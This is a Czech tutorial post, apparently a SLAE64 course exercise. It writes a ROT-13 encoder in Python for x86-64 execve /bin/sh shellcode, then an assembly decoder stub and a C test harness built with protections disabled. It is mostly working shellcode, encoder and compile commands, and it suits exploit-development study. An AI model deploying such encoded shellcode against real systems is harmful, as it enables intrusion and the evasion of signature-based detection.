Ve čtvrtém textu této 64bitové série bude vytvořeno custom encoding schéma fungující na principu insertion encoderu s execve-stack jako shellcodem.
Pro custom encoder použiji velmi jednoduchou šifru ROT-13 pro každý byte.
#!/usr/bin/env python
# Filename: encoder.py
# Author: SLAE64-14209
shellcode = ("\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05")
rot = 13
max = 256 - rot
encoded = ""
encoded2 = []
for x in bytearray(shellcode):
if x < max:
encoded += '\\x%02x' % (x + rot)
encoded2.append('0x%02x' % (x + rot))
else:
encoded += '\\x%02x' % (rot - 256 + x)
encoded2.append('0x%02x' % (rot - 256 + x))
print "Encoded:\n%s\n" % encoded
print "Encoded2:\n%s\n" % ','.join(encoded2)
Encodovaný shellcode:
\x55\x3e\xcd\x5d\x55\xc8\x3c\x6f\x76\x7b\x3c\x3c\x80\x75\x60\x55\x96\xf4\x5d\x55\x96\xef\x64\x55\x96\xf3\x55\x90\xcd\x48\x1c\x12
Vytvořený nasm soubor:
# Filename: decoder.nasm
# Author: SLAE64-14209
global _start
section .text
_start:
jmp short call_shellcode
decoder:
pop rsi ; pop address of the shellcode in RSI
xor rcx, rcx ; zeroize RCX register
mov cl, 32 ; counter = 32 (length of the shellcode)
decode:
cmp byte [rsi], 0xD ; compare if is possible to substract value 13
jl max_reached ; jump if less -> max_reached
sub byte [rsi], 0xD ; substract value 13
jmp short shellcode
max_reached:
xor rdx, rdx ; zeroize EDX register
mov dl, 0xD ; set 13 into RDX
sub dl, byte [rsi] ; 13 - byte value of the shellcode
xor rbx, rbx ; zeroize RBX register
mov bl, 0xff ; 0xff = 255
inc rbx ; = 256
sub bx, dx ; 256 - (13 - byte value of the shellcode)
mov byte [rsi], bl ; move bl into RSI
shellcode:
inc rsi ; move to next byte
loop decode ; loop "decode"
jmp short EncodedShellcode
call_shellcode:
call decoder
EncodedShellcode: db 0x55,0x3e,0xcd,0x5d,0x55,0xc8,0x3c,0x6f,0x76,0x7b,0x3c,0x3c,0x80,0x75,0x60,0x55,0x96,0xf4,0x5d,0x55,0x96,0xef,0x64,0x55,0x96,0xf3,0x55,0x90,0xcd,0x48,0x1c,0x12Zkompilujeme:
- nasm -f elf64 -o decoder.o decoder.nasm
- ld decoder.o -o decoder
- objdump -d decoder -M intel
- no nullbytes
- objdump -d ./decoder|grep ‘[0-9a-f]:’|grep -v ‘file’|cut -f2 -d:|cut -f1-6 -d’ ‘|tr -s ‘ ‘|tr ‘\t’ ‘ ‘|sed ‘s/ $//g’|sed ‘s/ /\\x/g’|paste -d ” -s |sed ‘s/^/”/’|sed ‘s/$/”/g’
“\xeb\x2b\x5e\x48\x31\xc9\xb1\x20\x80\x3e\x0d\x7c\x05\x80\x2e\x0d\xeb\x14\x48\x31\xd2\xb2\x0d\x2a\x16\x48\x31\xdb\xb3\xff\x48\xff\xc3\x66\x29\xd3\x88\x1e\x48\xff\xc6\xe2\xdd\xeb\x05\xe8\xd0\xff\xff\xff\x55\x3e\xcd\x5d\x55\xc8\x3c\x6f\x76\x7b\x3c\x3c\x80\x75\x60\x55\x96\xf4\x5d\x55\x96\xef\x64\x55\x96\xf3\x55\x90\xcd\x48\x1c\x12”
#include <stdio.h>
#include <string.h>
unsigned char code[] =
// Decoder stub:
"\xeb\x2b\x5e\x48\x31\xc9\xb1\x20\x80\x3e\x0d\x7c\x05\x80\x2e\x0d\xeb\x14\x48\x31\xd2\xb2\x0d\x2a\x16\x48\x31\xdb\xb3\xff\x48\xff\xc3\x66\x29\xd3\x88\x1e\x48\xff\xc6\xe2\xdd\xeb\x05\xe8\xd0\xff\xff\xff\x55\x3e\xcd\x5d\x55\xc8\x3c\x6f\x76\x7b\x3c\x3c\x80\x75\x60\x55\x96\xf4\x5d\x55\x96\xef\x64\x55\x96\xf3\x55\x90\xcd\x48\x1c\x12"
// Encoded shellcode:
"\x55\x3e\xcd\x5d\x55\xc8\x3c\x6f\x76\x7b\x3c\x3c\x80\x75\x60\x55\x96\xf4\x5d\x55\x96\xef\x64\x55\x96\xf3\x55\x90\xcd\x48\x1c\x12";
int main(void) {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}- gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
- ./shellcode
Všechny použité soubory můžete nalézt zde: https://github.com/Pal1Sec/SLAE64